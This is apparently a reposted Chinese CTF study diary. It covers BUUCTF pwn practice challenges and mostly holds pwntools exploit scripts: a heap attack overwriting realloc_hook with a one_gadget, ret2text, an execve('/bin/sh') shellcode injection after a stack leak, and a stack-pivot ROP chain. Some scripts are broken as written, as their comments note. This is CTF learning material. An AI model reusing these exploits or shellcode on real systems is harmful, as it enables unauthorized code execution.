21 07 27学习总结

21.07.27学习总结

Column: July 27, 2021
Tags: learning experience

前言:

前几天在忙xctf和拆笔记本电脑, 除了自己撸出一道ctb外, 没什么其它实际产出(因为装内核一直失败), 所以就没怎么写博客

06:00-08:00: buu刷题, roarctf_2019_easy_pwn版本下错了…然后捣腾了两个小时, 学到了realloc_hook写onegadget的方法

16:00-16:30: buu刷题: wustctf2020_getshell_2: call和直接ret真实地址/plt表的区别: call压栈, ret不压栈

20:00-22:00: buu刷题: wustctf2020_closed: 输出重定向, exec(1>&0)

wustctf2020_getshell_2: ret2text

pwnable_start: 先泄露栈地址再执行shellcode

mrctf2020_easyoverflow: 绕过strcpy就行了

ciscn_2019_s_4: 写rop在栈上然后栈迁移

0ctf_2017_babyheap: 堆入门经典题

roarctf_2019_easy_pwn

#!/usr/bin/env python
# coding=utf-8
from pwn import *
#sh=process('./roarctf_2019_easy_pwn')
# NOTE(review): `sh` is never bound in this script — the process() line above
# is commented out and no remote() replaces it — so every helper below that
# touches sh.recv()/sh.sendline() raises NameError as written.
elf=ELF('./roarctf_2019_easy_pwn')
# Debug level echoes every byte sent and received; noisy, but it is how a
# recv() that desyncs from the menu gets spotted.
context.log_level='debug'
context.binary=elf
# elf.libc is whatever libc pwntools associates with the binary; the commented
# line is the pinned alternative. The offsets in pwn() assume the matching
# build — TODO confirm.
libc=elf.libc
#libc=ELF('./libc-2.27.so')

def Create(size):
    """Menu option 1: request a chunk of `size` bytes from the module-level `sh` session."""
    for answer in ('1', str(size)):
        sh.recv()
        sh.sendline(answer)

def Write(idx, size, content):
    """Menu option 2: send `content` to chunk `idx`, announcing `size` as the length.

    Note the final answer uses send(), not sendline(), so `content` is
    transmitted byte-for-byte with no trailing newline.
    """
    for answer in ('2', str(idx), str(size)):
        sh.recv()
        sh.sendline(answer)
    sh.recv()
    sh.send(content)

def Drop(idx):
    """Menu option 3: drop the chunk at index `idx`."""
    for answer in ('3', str(idx)):
        sh.recv()
        sh.sendline(answer)

def Show(idx):
    """Menu option 4: ask the target to show the chunk at index `idx`."""
    for answer in ('4', str(idx)):
        sh.recv()
        sh.sendline(answer)

def stop():
    """Print the target's PID(s) and block until the user continues (Python 2 print)."""
    pid_text = str(proc.pidof(sh))
    print pid_text
    pause()

def pwn():
    """Drive the challenge menu end to end, then hand the session to the user.

    Uses the module-level ``sh`` connection and ``libc``. Every numeric offset
    below is tied to this particular binary/libc build — TODO confirm before
    running it against anything else.
    """
    # Seven allocations per size class, all freed again; 7 matches the glibc
    # tcache per-bin limit, so these presumably fill the 0xd0 and 0x60 bins.
    [Create(0xd0) for i in range(7)]
    [Create(0x68) for i in range(4)]
    for i in range(7):
        Drop(i)
    [Create(0x60) for i in range(7)]
    for i in range(7):
        Drop(i)
    # payload is 0x69 bytes while chunk 7 was requested with 0x68: the final
    # p8(0xe1) lands one byte past the request (presumably the challenge's bug).
    payload='\0'*0x60+p64(0)+p8(0xe1)
    Write(7, 0x72, payload)
    Drop(8)
    Create(0x68)
    Show(9)
    sh.recvuntil('content: ')
    # Eight raw bytes echoed from chunk 9 are read back as a libc pointer.
    leak_libc=u64(sh.recv(8))
    # 0x3ebc40 is presumably main_arena in the libc-2.27 build named at the top — TODO confirm.
    libc_base=leak_libc-0x60-0x3ebc40
    log.success('libc_base: '+hex(libc_base))
    Create(0x68)
    Drop(0)
    Drop(1)
    # Eight-byte write into chunk 9, derived from the same leak.
    payload2=p64(leak_libc-0x60-0x33)
    Write(9, 8, payload2)
    Create(0x60)
    Create(0x60)
    
    # one_gadget offsets for this libc build; only index 2 is used below.
    one_gadget=[0x4f3d5, 0x4f432, 0x10a41c ]
    # 11 bytes of padding, then the gadget address followed by realloc+10
    # (the +10 presumably skips realloc's prologue pushes — TODO confirm).
    payload3=p8(0)*(8+3)+p64(libc_base+one_gadget[2])+p64(libc_base+libc.sym['realloc']+10)
    Write(1, len(payload3), payload3)
    # A final allocation is what triggers the overwritten hook (realloc_hook,
    # per the writeup's note above).
    Create(10)
    sh.interactive()

# Runs on import as well — there is no `if __name__ == '__main__'` guard.
pwn()

wustctf2020_getshell_2

#!/usr/bin/env python
# coding=utf-8
from pwn import *
#sh=process('./wustctf2020_getshell_2')
# Remote BUUOJ instance; swap in the process() line above for local testing.
sh=remote('node4.buuoj.cn', 29172)
elf=ELF('./wustctf2020_getshell_2')  # loaded but never referenced below

# pwntools pause(): waits for the user before anything is sent, so a
# debugger can be attached first.
pause()
# 28 bytes of filler, then two fixed 32-bit addresses from this binary
# (ret2text, per the writeup) — TODO confirm against the actual .text layout.
payload='w'*28+p32(0x8048529)+p32(0x8048670)
sh.recv()
sh.send(payload)
sh.interactive()

pwnable_start

#!/usr/bin/env python
# coding=utf-8
from pwn import *
#sh=process('./start')
sh=remote('node4.buuoj.cn',29382)
context.binary=ELF('./start')
#context.log_level='debug'
# 21 bytes of i386 machine code; presumably spawns a shell — the byte runs
# 2f 2f 73 68 and 2f 62 69 6e spell "//sh" and "/bin".
shellcode='\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'
# First send: 20 bytes of filler, then a fixed address inside ./start.
payload='w'*20+p32(0x8048087)
#gdb.attach(sh, '''b *0x0804808F''')
sh.recvuntil(':')
sh.send(payload)
# The target echoes 4 bytes that are read back as a stack address.
leak_stack=u32(sh.recv(4))
read_addr=leak_stack-4
# Second send: same filler, a leak-relative address, then the code above.
# The +24 is specific to this binary's frame layout — TODO confirm.
payload='w'*20+p32(read_addr+24)+shellcode
sh.recv()
sh.send(payload)
sh.interactive()

mrctf2020_easyoverflow

#!/usr/bin/env python
# coding=utf-8
from pwn import *
#sh=process('./mrctf2020_easyoverflow')
sh=remote('node4.buuoj.cn', 26361)
# 48 filler bytes followed by the string the binary presumably compares
# against (per the writeup, this only has to get past a strcpy check).
payload='w'*8*6+'n0t_r3@11y_f1@g'
sh.sendline(payload)
sh.interactive()

ciscn_2019_s_4

#!/usr/bin/env python
# coding=utf-8
from pwn import *
#sh=process('./ciscn_s_4')
sh=remote('node4.buuoj.cn',25390)
elf=ELF('./ciscn_s_4')
context.log_level='debug'
# NOTE(review): this reads `libc` off the ELF *class*, not off `elf`, so it is
# not a loaded libc object; the name is never used below anyway.
libc=ELF.libc

# Named for a `leave; ret` sequence in this binary — TODO confirm for this build.
leave_ret=0x8048562
# 40 filler bytes; the target echoes them back followed by 4 bytes that are
# read as a stack address.
payload1='a'*40
sh.send(payload1)
sh.recvuntil('a'*40)
leak_stack=u32(sh.recv(4))
log.success('leak_stack: '+hex(leak_stack))
# 0x38 is this binary's frame-relative distance — TODO confirm.
read_addr=leak_stack-0x38
log.success('read addr: '+hex(read_addr))
# Second buffer: a "/bin/sh" string, a fixed address, two leak-relative
# addresses around three more copies of the string, then leave_ret (the stack
# migration the writeup describes).
payload2='/bin/sh\x00'+p32(0x08048559)+p32(read_addr+8+8)+'/bin/sh\x00'*3+p32(read_addr+4)+p32(leave_ret)
# Waits for the user so a debugger can be attached before the second send.
pause()
sh.recv()
sh.send(payload2)
sh.interactive()


転載: blog.csdn.net/eeeeeight/article/details/119194096